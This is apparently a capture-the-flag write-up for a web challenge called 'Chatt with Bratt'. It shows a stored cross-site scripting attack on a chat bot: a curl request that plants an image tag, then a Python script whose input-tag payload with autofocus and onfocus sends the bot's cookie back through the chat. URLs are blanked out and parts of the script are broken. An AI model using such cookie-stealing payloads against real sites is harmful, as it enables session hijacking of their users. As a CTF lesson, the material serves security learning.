Chatt with Bratt [Web]

Chatt with Bratt

After announcing that he would be having an anonymous 1-on-1 AMA with randomly chosen, adoring fans, an engineering team hacked together a web app and likely forget to patch some obvious security holes.


Chat application. You send messages as "Anon" to a person named "Bratt Pitt".

Including an image tag will make "Bratt Pitt" visit our server:

export ses="b6489e18-6184-11ea-bf69-e6d97c3cba85"

curl -svv '' \
    -H 'Content-Type: application/json' \
    -H "Cookie: chat_id=$ses; secret=none" \
    -d '{"content": "AAAA<img src=\"\"/>"}'

Since we have XSS, we can steal Bratt's cookies using a <input> tag with autofocus and onfocus attributes.

import requests

cookies = {
    'chat_id': 'b6489e18-6184-11ea-bf69-e6d97c3cba85',
    'secret': 'none',

headers = {
    'Content-Type': 'application/json',

data = {
    "content": """

AAAAAAAAAA<input autofocus onfocus="document.getElementById('message').value = document.cookie;sendMessage();">


response ='', headers=headers, cookies=cookies, json=data)

Bratt will send us the flag through chat.